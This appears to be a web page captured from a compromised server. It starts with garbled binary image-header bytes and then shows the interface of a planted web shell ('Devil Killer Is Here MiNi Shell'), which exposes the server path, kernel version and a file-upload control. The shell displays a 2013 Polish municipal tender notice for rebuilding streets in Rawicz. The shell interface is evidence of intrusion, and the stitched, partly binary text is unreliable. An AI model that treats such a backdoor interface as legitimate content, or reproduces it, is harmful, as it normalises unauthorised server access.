JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130328/46897-N-2013.html

<p class="kh_header"><b>Rawicz: Zaprojektowanie wraz z przebudową ulic Prusa i Polnej oraz ciągu pieszo jezdnego w Rawiczu</b><br>
<b>Numer ogłoszenia: 46897 - 2013; data zamieszczenia: 28.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie wraz z przebudową ulic Prusa i Polnej oraz ciągu pieszo jezdnego w Rawiczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje zaprojektowanie i wykonanie obiektu budowlanego w zakresie  dróg. Wykonawca jest zobowiązany do opracowania pełnej dokumentacji projektowej niezbędnej do zgłoszenia właściwemu organowi robót budowlanych polegających  na przebudowie ulicy Prusa na osiedlu Sarnowa w Rawiczu, przebudowie ulicy Polnej wraz  z przebudową ciągu pieszo - jezdnego na odcinku od ul. XXX - lecia do ul. Tęczowej na osiedlu Sierakowo w Rawiczu  wraz z wykonaniem robót budowlanych związanych z realizacją tych zadań,  zgodnie  z założeniami,  wytycznymi  i wymaganiami zawartymi w programie funkcjonalno - użytkowym dla tych zadań. Zakres robót budowlanych  dla poszczególnych zakresów obejmuje : ZAKRES 1. Przebudowa ul. Prusa na osiedlu Sarnowa w Rawiczu  obejmuje w szczególności: opracowanie dokumentacji projektowej wraz ze zgłoszeniem robót we właściwym organie budowlanym; roboty rozbiórkowe jezdni, chodnika, ogrodzenia i budynku wraz z transportem materiału rozbiórkowego oraz uporządkowaniem terenu; regulacja wysokościowa urządzeń; budowa 6 szt. wpustów ulicznych wraz z przykanalikami o dł. 30mb; wykonanie nawierzchni jezdni, chodnika  i zjazdów o łącznej pow. 1.185m2, przełożenie kostki 50m2;  ułożenie krawężnika 340 mb,  obrzeża 230 mb i ścieku  300mb;  obsługa geodezyjna, organizacja ruchu, oznakowanie pionowe i poziome oraz badanie zagęszczenia gruntu; inne prace towarzyszące wykonaniu zamówienia. Wymagania Zamawiającego w stosunku  do przedmiotu zamówienia, warunki techniczne,  dane dotyczące konstrukcji nawierzchni  jak również inne zapisy zostały zawarte w niniejszej specyfikacji oraz zostały szczegółowo określone w programie funkcjonalno - użytkowym stanowiącym załącznik nr 7 do SIWZ. ZAKRES 2. Przebudowa ul. Polnej  oraz ciągu pieszo - jezdnego na odcinku  od ul. XXX lecia do ul. Tęczowej na osiedlu Sierakowo  w Rawiczu   obejmuje w szczególności : opracowanie dokumentacji projektowej wraz ze zgłoszeniem robót we właściwym organie budowlanym; roboty rozbiórkowe wraz z transportem materiału rozbiórkowego oraz uporządkowaniem terenu; frezowanie nawierzchni bitumicznej, ułożenie warstwy ścieralnej  oraz wyrównawczej  na pow.  780m2, ułożenie nawierzchni z kostki brukowej  na pow. 700 m2  w tym: ułożenie chodnika - 380m2,  zjazdów - 100m2, 
 ciągu pieszo - jezdnego - 220m2;  ułożenie ścieku ulicznego 320mb, krawężnika - 250 mb, obrzeża betonowego - 270 mb, opornika  - 30mb; budowa wpustów  ulicznych - 7 szt. wraz z przykanalikami o dł. 64 mb;  obsługa geodezyjna, organizacja ruchu i  oznakowanie;  inne prace towarzyszące wykonaniu zamówienia. Wymagania Zamawiającego w stosunku  do przedmiotu zamówienia, warunki techniczne, dane dotyczące konstrukcji nawierzchni  określają zapisy niniejszego rozdziału oraz zostały szczegółowo określone w programie funkcjonalno - użytkowym stanowiącym załącznik nr  7 do SIWZ.      
Mogące występować w programie funkcjonalno - użytkowym nazwy własne producentów lub wyrobów zostały użyte wyłącznie w celu wskazania założonego standardu przyjętych rozwiązań. 2. Na Wykonawcy ciąży obowiązek wykonania w ramach zaoferowanej ceny następujących prac:  zakup i aktualizacja podkładów mapowych do celów projektowych, uzyskanie w imieniu i na rzecz Zamawiającego wszelkich wymaganych prawem uzgodnień i decyzji  związanych z opracowaniem projektu budowlanego w zakresie potrzebnym dla realizacji inwestycji,  opracowanie projektu budowlanego wraz z informacją BIOZ, sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych w zakresie niezbędnym do realizacji niniejszego zamówienia, zgłoszenie właściwemu organowi rozpoczęcie robót związanych z przebudową dróg i ciągu pieszo - jezdnego, opracowanie i zatwierdzenie projektu zmiany organizacji ruchu na czas  prowadzenia robót, wykonanie robót budowlanych związanych z przebudową ulic i ciągu pieszo jezdnego.  
3. Wykonawca na podstawie udzielonego pełnomocnictwa do działania w imieniu Gminy Rawicz zobowiązany jest w imieniu Zamawiającego i na jego rzecz uzyskać wymagane zezwolenia, decyzje, opinie, uzgodnienia niezbędne do opracowania  projektów.  Koszty z tym związane ponosi Wykonawca  w ramach  zaproponowanej ceny ofertowej. 4. Wykonawca jest zobowiązany do opracowania dokumentacji projektowej w oparciu o obowiązujące przepisy prawne, 
w szczególności o wymogi wynikające z Prawa budowlanego oraz przepisy wykonawcze  jak również uwzględnić warunki 
i wymagania określone w wydanych opiniach i uzgodnieniach. Zakres i treść projektów budowlanych powinna być dostosowana do specyfiki i charakteru obiektu oraz stopnia skomplikowania robót budowlanych. 
Wykonawca w trakcie prac projektowych jest zobowiązany informować Zamawiającego  o stopniu zaawansowania prac oraz o proponowanych rozwiązaniach projektowych.  Zamawiający zastrzega sobie prawo do oceny, korekty i akceptacji proponowanych rozwiązań  w trakcie prowadzonych prac projektowych. 
Ponadto w ramach ceny ofertowej każdy Wykonawca będzie zobowiązany do: przyjazdu do siedziby Zamawiającego celem zaprezentowania postępu prac projektowych, konsultowania (na roboczo) z Zamawiającym zaproponowanych rozwiązań, poniesienia kosztów badań podłoża gruntowego. Dokumentacja projektowa  oprócz wersji papierowej musi  być przekazana  w wersji elektronicznej  w formacie dwg ( nie nowszy niż 2006) lub dxf oraz w pdf. 
5. Wykonawca po opracowaniu projektu i zgłoszeniu rozpoczęcia przebudowy ulic i ciągu pieszo - jezdnego (przed rozpoczęciem robót) będzie zobowiązany do zdania Zamawiającemu niżej wymienione dokumenty (osobno dla każdego zakresu): po 2 egzemplarze projektu budowlanego wraz z wszystkimi  w tym zakresie uzgodnieniami  oraz BIOZ +  1 egz.  w wersji 
elektronicznej w formacie  dwg (nie nowszy  niż Auto Cad 2006) lub dxf oraz w pdf ;   po 2 egzemplarze  specyfikacji technicznej wykonania i odbioru robót budowlanych  + wersja elektroniczna w word,  po 2 egzemplarze dokumentacji zmiany organizacji ruchu  + wersja elektroniczna, oświadczenie, że opracowana dokumentacja jest zgodna z obowiązującymi przepisami oraz zasadami wiedzy technicznej,  oświadczenia o przeniesieniu na Zamawiającego wszelkich uprawnień z tytułu praw autorskich i pokrewnych, zgłoszenie właściwemu organowi budowlanemu o zamiarze przebudowy (rozpoczęcia robót budowlanych). Fakt złożenia wniosku  winien być potwierdzony przez organ budowlany - Starostwo Powiatowe w Rawiczu,  podkłady mapowe wykorzystane do prac projektowych - do zdania Zamawiającemu.  Wymienione wyżej ilości dokumentacji nie obejmują tych egzemplarzy, które należy złożyć we właściwym organie architektoniczno-budowlanym lub będą wykorzystane do celów uzgodnień, jak również nie obejmują kompletu dokumentacji projektowej, którą Wykonawca jest zobowiązany sobie dodatkowo zabezpieczyć na czas prowadzenia robót.   
Przy wycenie przedmiotu zamówienia należy uwzględnić ilości egzemplarzy przeznaczone dla Zamawiającego jak również te, które należy złożyć w innych organach. 6. Przy wykonawstwie oraz odbiorze robót objętych zamówieniem obowiązywać  będą zasady i wymagania dotyczące zasad  prowadzenia robót jak również ogólne wymagania dotyczące wykonania i odbioru robót budowlanych określone: projekcie budowlanym opracowanym w oparciu o założenia zawarte programie funkcjonalno-użytkowym, kosztorysie ofertowym, w opracowanej  przez Wykonawcę, zgodnie z obowiązującymi w tym zakresie przepisami, Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych, specyfikacji istotnych warunków zamówienia, Polskich Normach.  7. Wykonawca przy realizacji robót budowlanych i prac projektowych zobowiązany będzie również do: stosowania wyrobów budowlanych wprowadzonych do obrotu na zasadach określonych w ustawie z dnia 16.04. 2004 roku o wyrobach budowlanych (Dz. U. Nr 92 poz. 881 z późniejszymi  zm.); wykonania przedmiotu umowy zgodnie z  przepisami prawa budowlanego przy pomocy osób posiadających odpowiednie kwalifikacje i uprawnienia oraz wyposażonych w odpowiedni sprzęt i narzędzia;  właściwego zabezpieczenie i oznakowanie terenu budowy oraz  placu budowy, ubezpieczenie budowy i robót z tytułu szkód, które mogą zaistnieć w związku z  określonymi zdarzeniami  losowymi oraz od odpowiedzialności cywilnej,  ponoszenia kosztów szkód wynikłych w czasie wykonywania robót jak również za odpowiedzialność za wszelkie zdarzenia powstałe z tej przyczyny; organizacji i zagospodarowania placu budowy oraz zaplecza budowy, ustanowienie  kierownika budowy oraz w razie potrzeby wykonanie planu bezpieczeństwa i ochrony zdrowia, zgodnie  z Rozporządzeniem Ministra Infrastruktury  z dnia 23.06. 2003 r.  w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U.  Nr 120 poz. 1126)  zmiany organizacji ruchu na odcinku wykonywanych prac ( wykonanie i zatwierdzenie projektu organizacji  ruchu na czas wykonywanych robót oraz oznakowanie robót wg projektu ), obsługa geodezyjna podczas realizacji inwestycji oraz sporządzenie inwentaryzacji geodezyjnej powykonawczej ( do zdania Zamawiającemu) jak również  zgłoszenie jej w ośrodku geodezyjnym, zorganizowanie i przeprowadzenie niezbędnych prób, pomiarów, badań ( w tym badanie zagęszczenia gruntu) i odbiorów oraz wykonanie dokumentacji powykonawczej, po zakończeniu robót doprowadzenie terenu budowy do stanu pierwotnego, demontaż obiektów tymczasowych  oraz  uporządkowanie całego terenu zajętego na prowadzenie robót ,  udzielenia 3 letniej rękojmi i gwarancji na wykonane roboty i wbudowane materiały .UWAGA: Dokładny zakres prac projektowych i wykonawstwa oraz dodatkowe wymagania Inwestora określono w  Programie funkcjonalno - użytkowym stanowiącym załącznik do niniejszej SIWZ. Program ten służy Wykonawcy jako wytyczne i stanowi podstawę do przygotowania oferty na opracowanie projektu i realizację robót oraz zawiera dane potrzebne do ustalenia kosztów prac projektowych i robót budowlanych.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje dla każdego zakresu udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt  6 ustawy, stanowiących nie więcej niż  50% wartości zamówienia podstawowego każdego zakresu polegającego na powtórzeniu tego samego rodzaju zamówień, w okresie 3 lat od udzielenia zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniona i podpisana przez Wykonawcę oferta przetargowa w oryginale  (załącznik nr 1 do SIWZ).
2.KOSZTORYS OFERTOWY (kalkulacja cenowa - załącznik nr 6 do SIWZ )  w wersji papierowej opracowany przez WYKONAWCĘ  w oparciu o dane zawarte w kalkulacji cenowej,  załączony program funkcjonalno - użytkowy oraz zapisy zawarte w niniejszej specyfikacji. Zamawiający zastrzega sobie możliwość żądania od wybranego Wykonawcy do złożenia kosztorysu ofertowego w wersji elektronicznej.
3.Oryginał pełnomocnictwa do reprezentowania ( o ile ofertę składa pełnomocnik)  lub kopia pełnomocnictwa poświadczona przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach: 

1.potrzeby wykonania robót zamiennych lub odstąpienia od realizacji części robót, i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego lub Wykonawcy,
2.wystąpienia robót dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,      
3.na uzasadniony wniosek Wykonawcy zaakceptowany przez Zamawiającego i pod warunkiem, że zmiana ta wynika z okoliczności których Wykonawca nie mógł  przewidzieć  na etapie składania oferty i nie jest przez niego zawiniona, 
4.zmiany  technologii wykonania robót,  
5.zmiany urzędowej wysokości stawki podatku VAT, 
6.wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,  
7.wprowadzenie lub zmiana zgłoszonych w ofercie części robót wykonywanych przy udziale Podwykonawcy, za uprzednią zgodą Zamawiającego, 
8.zmiany  terminu realizacji zamówienia, 
9.przekształcenie którejkolwiek ze stron umowy,
10.zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za  realizację zamówienia itp.)
11.warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna dla Zamawiającego,
12.innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego - w Urzędzie Miejskim Gminy Rawicz, ul. Piłsudskiego 21, 63-900 Rawicz, pokój 111 - po wpłaceniu należności w kasie Urzędu lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego - sekretariacie Urzędu Miejskiego Gminy Rawicz, 63-900 Rawicz, ul. Piłsudskiego 21 pokój 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowe ze środków Unii Europejskiej. 2. Wszelkie oświadczenia, wnioski, zawiadomienia, wezwania oraz inne informacje i dokumenty w postępowaniu o udzielenie zamówienia ZAMAWIAJĄCY i WYKONAWCY przekazują pisemnie. 3. ZAMAWIAJĄCY dopuszcza również możliwość porozumiewania się OBU STRON (Wykonawca, Zamawiający) za pomocą: faksu 65 546-41-67 oraz poczty elektronicznej przetargi@rawicz.pl 4. Jeżeli ZAMAWIAJĄCY lub WYKONAWCA przekaże faksem lub pocztą elektroniczną dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 5. Zamawiający nie przewiduje zawarcia umowy ramowej. 6. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 7. Zamawiający nie przewiduje określania w opisie przedmiotu zamówienia wymagań związanych z realizacją zamówienia o których mowa w art. 29 ust. 4.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres 1 Przebudowa ul. Prusa na osiedlu Sarnowa w Rawiczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa ul. Prusa na osiedlu Sarnowa w Rawiczu  obejmuje w szczególności: opracowanie dokumentacji projektowej wraz ze zgłoszeniem robót we właściwym organie budowlanym; roboty rozbiórkowe jezdni, chodnika, ogrodzenia i budynku wraz z transportem materiału rozbiórkowego oraz uporządkowaniem terenu; regulacja wysokościowa urządzeń; budowa 6 szt. wpustów ulicznych wraz z przykanalikami o dł. 30mb; wykonanie nawierzchni jezdni, chodnika  i zjazdów o łącznej pow. 1.185m2, przełożenie kostki 50m2;  ułożenie krawężnika 340 mb,  obrzeża 230 mb i ścieku  300mb;  obsługa geodezyjna, organizacja ruchu, oznakowanie pionowe i poziome oraz badanie zagęszczenia gruntu; inne prace towarzyszące wykonaniu zamówienia. Wymagania Zamawiającego w stosunku  do przedmiotu zamówienia, warunki techniczne,  dane dotyczące konstrukcji nawierzchni  jak również inne zapisy zostały zawarte w niniejszej specyfikacji oraz zostały szczegółowo określone w programie funkcjonalno - użytkowym stanowiącym załącznik nr 7 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
